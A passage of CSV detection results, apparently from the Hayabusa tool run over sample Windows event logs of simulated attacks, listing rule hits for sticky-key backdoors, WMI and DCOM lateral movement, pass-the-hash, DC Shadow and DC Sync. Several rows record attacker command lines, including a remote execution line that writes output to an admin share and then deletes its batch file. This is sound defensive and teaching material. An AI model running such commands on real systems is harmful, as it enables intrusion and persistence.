+00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:37.439 +00:00,srvdefender01.offsec.lan,4688,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation_builtin/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:17:37.460 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 09:18:03.033 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 10:04:23.189 +00:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-26 14:16:45.757 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:45.757 +00:00,fs02.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:47.267 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 14:16:47.267 +00:00,fs02.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 15:03:05.976 +00:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" +2021-04-26 15:03:05.992 +00:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-26 15:16:03.001 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.001 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.978 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.978 +00:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:03.992 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.047 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.047 +00:00,srvdefender01.offsec.lan,4688,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation_builtin/proc_creation_win_mmc20_lateral_movement.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-26 15:16:04.284 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 11:04:03.495 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:03.497 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:03.502 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:13.291 +00:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 11:04:53.341 +00:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 14:54:29.317 +00:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:31.493 +00:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:49.355 +00:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:54:51.591 +00:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:28.669 +00:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:34.819 +00:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:45.042 +00:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:45.392 +00:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:46.789 +00:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:47.449 +00:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:48.746 +00:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:49.695 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:50.629 +00:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 14:59:54.886 +00:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:05.147 +00:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:05.466 +00:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:06.878 +00:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:07.557 +00:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:09.605 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:00:10.730 +00:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.723 +00:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ac4,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.762 +00:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.790 +00:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:17.920 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:18.001 +00:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:20.658 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:30.691 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.825 +00:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.866 +00:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.904 +00:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.916 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:37.917 +00:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:40.730 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:03:50.745 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:04:00.785 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 15:04:10.808 +00:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 07:55:53.423 +00:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.433 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos 